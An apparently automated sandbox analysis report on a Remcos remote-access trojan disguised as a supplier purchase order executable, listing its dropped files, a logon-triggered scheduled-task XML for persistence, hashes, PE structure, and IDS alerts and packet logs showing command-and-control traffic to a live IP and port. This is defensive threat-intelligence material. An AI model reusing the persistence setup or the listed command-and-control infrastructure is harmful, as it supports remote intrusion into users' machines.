                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\keHuNxIumw.exe.log

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.34331486778365
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                  Download File
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):957
                                  Entropy (8bit):5.007722524309047
                                  Encrypted:false
                                  SSDEEP:24:qBdbauKyGX85jHf3SvXhNlT3/7YvfbYro:c00GX85mvhjTkvfEro
                                  MD5:FBEA5B5A68B9A87E64FA671D66B22262
                                  SHA1:C37C883F0D028E994BF84ABD9E3D5FD8ACEE546F
                                  SHA-256:339C6AD035A271525DAF53C417BB348B2288794820E87BF40EA297B6E09CA28B
                                  SHA-512:CAFB3022194324DD4D9F47AB7469AF2B5108123B5E4710A1EB464F94C34FAFD75ACC49BE43D239085DFCA3648371B621911FF7E096A926A9D73DB1AD136356BA
                                  Malicious:false
                                  Preview:{. "geoplugin_request":"173.254.250.71",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2232
                                  Entropy (8bit):5.379401388151058
                                  Encrypted:false
                                  SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugePu/ZPUyus:fLHxvIIwLgZ2KRHWLOugYs
                                  MD5:B01D320A5E00F6F44E3AD8CA06E3CD8C
                                  SHA1:5240EE0491CBB780ABEA523AC3A0B6434A6A4E6D
                                  SHA-256:4D3A7366CCBA6FFEA6A0B01F2609F414390C0A7768F348BFE658F0BE477500BB
                                  SHA-512:9BBED844058A91A68935D7A29CD111537E8A28B5FCE31984929A330100E09156E664410DB1C9E361D3C045A11BC7171C001466455F7BB57C1EF7E1E70E79B918
                                  Malicious:false
                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4l2xppn3.xlm.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrehmxo0.nid.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx0mab4b.5hl.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvcemrgj.ui5.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\tmp9421.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1583
                                  Entropy (8bit):5.1019317197798975
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtX5xvn:cgergYrFdOFzOzN33ODOiDdKrsuTXvv
                                  MD5:6EE00B242E731319B5111D3614356649
                                  SHA1:D2CDEA54DF72A65D33DD7111DBD2EA5012945790
                                  SHA-256:1B8F48DF5D5DF43AFCDF45B929A3B2BE8D97A2051A2940C52516E6AA1372FC9A
                                  SHA-512:2527FE3A57CB09548663ECAB3BC7639C82C0637E76E9D9C7CFA4A70E0F6C3FCD2C1C1FCD09AD6092EA5180997A9DACB714C14D1FAB9F290BBE250FD6F3BD7D40
                                  Malicious:true
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                  C:\Users\user\AppData\Local\Temp\tmpB43C.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:dropped
                                  Size (bytes):1583
                                  Entropy (8bit):5.1019317197798975
                                  Encrypted:false
                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtX5xvn:cgergYrFdOFzOzN33ODOiDdKrsuTXvv
                                  MD5:6EE00B242E731319B5111D3614356649
                                  SHA1:D2CDEA54DF72A65D33DD7111DBD2EA5012945790
                                  SHA-256:1B8F48DF5D5DF43AFCDF45B929A3B2BE8D97A2051A2940C52516E6AA1372FC9A
                                  SHA-512:2527FE3A57CB09548663ECAB3BC7639C82C0637E76E9D9C7CFA4A70E0F6C3FCD2C1C1FCD09AD6092EA5180997A9DACB714C14D1FAB9F290BBE250FD6F3BD7D40
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                  C:\Users\user\AppData\Roaming\keHuNxIumw.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):1025024
                                  Entropy (8bit):7.773297179915313
                                  Encrypted:false
                                  SSDEEP:24576:YLzHqFPLa+P2a13EfOUS2lQfMP+W8sQelk4vOG2ETh:6Lq9r+WPUSSWMGxwlib+
                                  MD5:9FE3811C49214479C36A4F4A35E9CA08
                                  SHA1:EDDBDE04B9751295E209ADDC60DE427C07B4CF1E
                                  SHA-256:3A15B2DF43B3665B869280969ADAEC6FC18DE92F2DA83E1D0228D7379FD55E09
                                  SHA-512:18A78507D0EC43DA2A68F5FA11B15C2AF877B5096F7375D3B4075AE0F269E3205B6C1BEADD16216A4523A43506D0962EFB8A962449F3906E9E547C825456D1E1
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 74%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{l...............0.................. ........@.. ....................................@.................................7...O....................................{..p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................k.......H......................hU...&...........................................0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*Z..}......}.....(.....*....0............{.....+..*&...}....*...0............{.....+..*&...}....*j.s....}......}.....(.....*....0............{.....+..*&...}....*...0............{.....+..*&...}....*".(.....*..0............{.....+..*&...}....*...0............{.....+..*

                                  C:\Users\user\AppData\Roaming\keHuNxIumw.exe:Zone.Identifier

                                  Download File
                                  Process:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.773297179915313
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:Supplier Purchase Order - PO0002491.exe
                                  File size:1'025'024 bytes
                                  MD5:9fe3811c49214479c36a4f4a35e9ca08
                                  SHA1:eddbde04b9751295e209addc60de427c07b4cf1e
                                  SHA256:3a15b2df43b3665b869280969adaec6fc18de92f2da83e1d0228d7379fd55e09
                                  SHA512:18a78507d0ec43da2a68f5fa11b15c2af877b5096f7375d3b4075ae0f269e3205b6c1beadd16216a4523a43506d0962efb8a962449f3906e9e547c825456d1e1
                                  SSDEEP:24576:YLzHqFPLa+P2a13EfOUS2lQfMP+W8sQelk4vOG2ETh:6Lq9r+WPUSSWMGxwlib+
                                  TLSH:4025F10017B9DA02E2B75BF808B1E7F447B56E99A831C30A8EE9BDEB3D327445550793
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{l...............0.................. ........@.. ....................................@................................

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x4fb88a
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0xB86C7B99 [Wed Jan 18 13:01:13 2068 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xfb8370x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xfc0000x584.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xfe0000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xf7bf80x70.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000xf98900xf9a00aabcb7ae3f7f1eff9e4e9fccc5a24999False0.9053707514396595data7.778713534955087IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0xfc0000x5840x600aa8721832339cbe9fdc81d2e5edced1cFalse0.4153645833333333data4.015798294002136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xfe0000xc0x20026ec026e60d2dd19d9aaa3fe16ec972fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0xfc0900x2f4data0.44047619047619047
                                  RT_MANIFEST0xfc3940x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-24T12:58:12.110788+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.549708192.210.150.142404TCP
                                  2024-10-24T12:58:12.784600+02002032777ET MALWARE Remcos 3.x Unencrypted Server Response1192.210.150.142404192.168.2.549708TCP
                                  2024-10-24T12:58:14.440169+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549710178.237.33.5080TCP
                                  2024-10-24T13:00:16.623458+02002032777ET MALWARE Remcos 3.x Unencrypted Server Response1192.210.150.142404192.168.2.549708TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 24, 2024 12:58:12.104074001 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:12.109636068 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:12.109723091 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:12.110788107 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:12.116157055 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:12.784600019 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:12.797528982 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:12.803288937 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:13.025482893 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:13.075388908 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:13.585968971 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 12:58:13.591753960 CEST8049710178.237.33.50192.168.2.5
                                  Oct 24, 2024 12:58:13.591962099 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 12:58:13.592226028 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 12:58:13.597706079 CEST8049710178.237.33.50192.168.2.5
                                  Oct 24, 2024 12:58:14.440066099 CEST8049710178.237.33.50192.168.2.5
                                  Oct 24, 2024 12:58:14.440169096 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 12:58:14.451651096 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:14.457564116 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:15.555850029 CEST8049710178.237.33.50192.168.2.5
                                  Oct 24, 2024 12:58:15.555922031 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 12:58:16.471971989 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:16.474471092 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:16.479808092 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:46.516985893 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:58:46.518624067 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:58:46.524187088 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:59:16.580583096 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:59:16.587809086 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:59:16.593157053 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:59:46.607960939 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 12:59:46.612632990 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 12:59:46.618012905 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:00:03.534708023 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 13:00:03.841067076 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 13:00:04.450602055 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 13:00:05.653594971 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 13:00:08.059824944 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 13:00:12.872286081 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 13:00:16.623457909 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:00:16.626025915 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 13:00:16.631412983 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:00:22.481705904 CEST4971080192.168.2.5178.237.33.50
                                  Oct 24, 2024 13:00:46.639147043 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:00:46.642268896 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 13:00:46.647816896 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:01:16.660980940 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:01:16.662873983 CEST497082404192.168.2.5192.210.150.14
                                  Oct 24, 2024 13:01:16.668288946 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:01:46.670084000 CEST240449708192.210.150.14192.168.2.5
                                  Oct 24, 2024 13:01:46.671272993 CEST497082404192.168.2.5192.210.150.14
